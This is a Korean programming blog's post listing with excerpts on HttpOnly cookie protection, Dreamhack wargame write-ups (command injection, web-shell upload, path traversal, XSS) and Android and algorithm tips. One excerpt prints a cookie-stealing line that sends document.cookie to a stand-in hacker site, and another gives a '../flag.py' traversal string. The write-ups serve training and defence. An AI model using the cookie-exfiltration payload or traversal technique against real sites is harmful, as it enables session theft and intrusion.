728x90 분류 전체보기721 웹 해킹 - XSS 공격으로 document.cookie 정보 가져오기 방지(HttpOnly) 해커는 아래처럼 document.cookie를 통해 중요한 쿠키 정보들을 수집하는 게 일반적 location.href = 'http://해커사이트/?cookies=' + document.cookie; 서버가 클라이언트에게 쿠키 값을 지정할 때에 HttpOnly라는 옵션을 추가시켜주면, (HttpOnly가 Http만 허용하고, Https는 허용하지 않는다 이게 아니다..) 클라이언트가 document.cookie를 아무리 출력해 보아도 해당 쿠키에 대한 정보는 출력이 되지 않는다. Set-Cookie: 쿠키명=쿠키값; path=/; HttpOnly HttpOnly 설정을 한 쿠키는 브라우저가 접근을 할 수 없도록 되버린 것. 당연히 서버에게 GET, POST 요청등을 할 때에는 HttpOnly 설정된 쿠키.. 2021. 11. 25. Dreamhack - 워게임, command-injection-1 https://dreamhack.io/wargame/challenges/44/ command-injection-1 특정 Host에 ping 패킷을 보내는 서비스입니다. Command Injection을 통해 플래그를 획득하세요. 플래그는 flag.py에 있습니다. Reference Introduction of Webhacking dreamhack.io Ping 페이지로 들어가면 아이피를 입력하는 폼이 보입니다. 127.0.0.1을 넣고 submit을 시켜보니, Ping의 결과가 출력이 되어 나옵니다. 아이피를 전달하여 시스템 명령어를 실행시키는 모양입니다. ping 말고도 다른 명령어를 실행시켜보기 위해서 ;(세미콜론)을 삽입시켜주었습니다. 하지만 요청한 형식과 일치시키라는 경고문이 뜨게 되는데, 이는 .. 2021. 11. 24. 안드로이드 스튜디오 - The minCompileSdk (31) specified in adependency's... 오류 해결 build.gradle로 들어가서 compileSdkVersion을 31로 수정 출처: https://ardmos.tistory.com/entry/The-minCompileSdk-31-specified-in-adependencys-AAR-metadata [오류 해결] The minCompileSdk (31) specified in adependency's AAR metadata ... 어제 새로 만든 프로젝트를 빌드하려던 도중 The minCompileSdk (31) specified in a dependency's AAR metadata ... 라는 내용의 오류가 발생했다. - 해결 방법! bulid.gradle (Module) 파일의 compileSdk와 targ.. ardmos.tistory.com 2021. 11. 24. Dreamhack - 워게임, image-storage https://dreamhack.io/wargame/challenges/38/ image-storage php로 작성된 파일 저장 서비스입니다. 파일 업로드 취약점을 이용해 플래그를 획득하세요. 플래그는 /flag.txt에 있습니다. Reference Server-side Basic dreamhack.io php로 작성된 파일 저장 서비스입니다. upload 페이지로 가면 파일을 업로드할 수 있는 페이지가 출력이 되는데 * 이곳에서는 업로드할 파일에 대한 어떠한 검증이 이루어지지 않고 있습니다. 즉, .exe, .php, .bat 같은 민감한 확장자를 가진 파일들도 마음대로 업로드가 가능합니다. 전 이곳에 간단한 웹쉘을 업로드 하였습니다. 웹쉘이란? 서버 사이드 스크립트 언어로 작성된(php, jsp, .. 2021. 11. 24. Dreamhack - 워게임, file-download-1 https://dreamhack.io/wargame/challenges/37/ file-download-1 File Download 취약점이 존재하는 웹 서비스입니다. flag.py를 다운로드 받으면 플래그를 획득할 수 있습니다. Reference Introduction of Webhacking dreamhack.io /read?name=../flag.py 를 입력해서 상위 디렉토리의 flag.py를 읽어 들이면 된다. 2021. 11. 24. 안드로이드 스튜디오 - fragment 조작하기 액티비티의 기본 레이아웃을 LinearLayout으로 변경 기본 horizontal를 vertical으로 변경 LinearLayout 자식을 두 개 넣어주기 각각 fragment 뷰어, fragment 전환 역할을 할 거임 첫 번째 자식 LinearLayout의 id를 Container로 수정 두 번째의 자식 LinearLayout에 button들을 넣어줌 그런데 미리보기에 button들이 보이지 않는 것을 볼 수 있는데, 이는 Container가 부모의 크기만큼 설정이 되어있어서 버튼의 레이아웃이 밀려난 것임 Container의 layout_weight 속성 값으로 1을 준다. 버튼 레이아웃의 layout_height를 wrap_content로 변경해준다. 그럼 버튼들이 제대로 나오는 것을 볼 수 있다.. 2021. 11. 23. 안드로이드 스튜디오 - 메뉴바 및 메뉴 아이템 조작하기 프로젝트 파일에서 res 폴더에 menu 폴더를 생성하고, menu.xml 생성 item을 집어넣고 id 값을 설정 package com.app.dbcontrol; import androidx.appcompat.app.AppCompatActivity; import android.os.Bundle; import android.view.Menu; import android.view.MenuItem; import android.widget.Toast; public class MainActivity extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceS.. 2021. 11. 23. 안드로이드 스튜디오 - 마지막 프로젝트 자동 열기 해제 Settings로 이동 검색창에 reopen 입력후에 Reopen last project on startup 체크 해제 참조: https://fiftiesstudy.tistory.com/126 파편012_마지막 프로젝트 자동 열기 해제 안드로이드 스튜디오는 실행하면 마지막에 작업한 프로젝트를 자동으로 여는 기능이 기본으로 설정되어 있다. 이것을 해제하려면 File > Settings에서 설정하면 된다. 검색창에 reopen(다시열기)를 fiftiesstudy.tistory.com 2021. 11. 23. 알고리즘 - 파이썬 for 반복문으로 리스트 생성하기 파이썬에서는 단 한 줄만으로 프로그래머가 원하는 리스트를 생성하는 게 가능하다. 0~n까지의 배열을 생성하거나, [ str(_) for _ in range(10) ] 0~n까지의 정수 값을 문자형태로 배열에 저장을 하거나, [ _ for _ in range(10) ] 2차원 배열로 만드는 것도 가능하다. [ [_ for _ in range(10)] for _ in range(2) ] 2021. 11. 22. 알고리즘 - 피보나치 수열 피보나치수열은 0, 1, 1, 2, 3, 5 ,8... 이런 순서로 앞의 수와 뒤의 수가 서로 더한 값을 수열 형태로 나타낸 것. (Fn = Fn-1 + fn-2) 피보나치수열을 구현하는 방법은 대표적으로 재귀 함수와 반복문을 이용하는 방법들이 있다. 우선 재귀함수로 피보나치수열을 구현하는 방법 int fibo(int n){ if( n 2021. 11. 22. 프로그래머스 - 피보나치 수, 파이썬 & C++ https://programmers.co.kr/learn/courses/30/lessons/12945 코딩테스트 연습 - 피보나치 수 피보나치 수는 F(0) = 0, F(1) = 1일 때, 1 이상의 n에 대하여 F(n) = F(n-1) + F(n-2) 가 적용되는 수 입니다. 예를들어 F(2) = F(0) + F(1) = 0 + 1 = 1 F(3) = F(1) + F(2) = 1 + 1 = 2 F(4) = F(2) + F(3) = 1 + 2 = 3 F(5) = F(3) + F(4) = programmers.co.kr def solution(n): fibo = [0, 1, 1] for i in range(3, n + 1): fibo.append( ( fibo[i-1] + fibo[i-2] ) % 1234.. 2021. 11. 22. Dreamhack - 워게임, XSS-1 https://dreamhack.io/wargame/challenges/28/ xss-1 여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다. XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다. Reference Client-side Basic dreamhack.io /flag로 진입해 아래의 스크립트를 넣어주어서 실행하였다. XHR 요청으로 서버 자기 자신의 쿠키를 메모하는 스크립트이다. /memo로 들어가 주면? 플래그 값이 나온다. XHR 요청말고도, location.href를 이용해도 쿠키가 담긴 GET 요청을 보낼 수가 있다. 2021. 11. 22. 이전 1 ··· 53 54 55 56 57 58 59 ··· 61 다음 728x90
HackLog
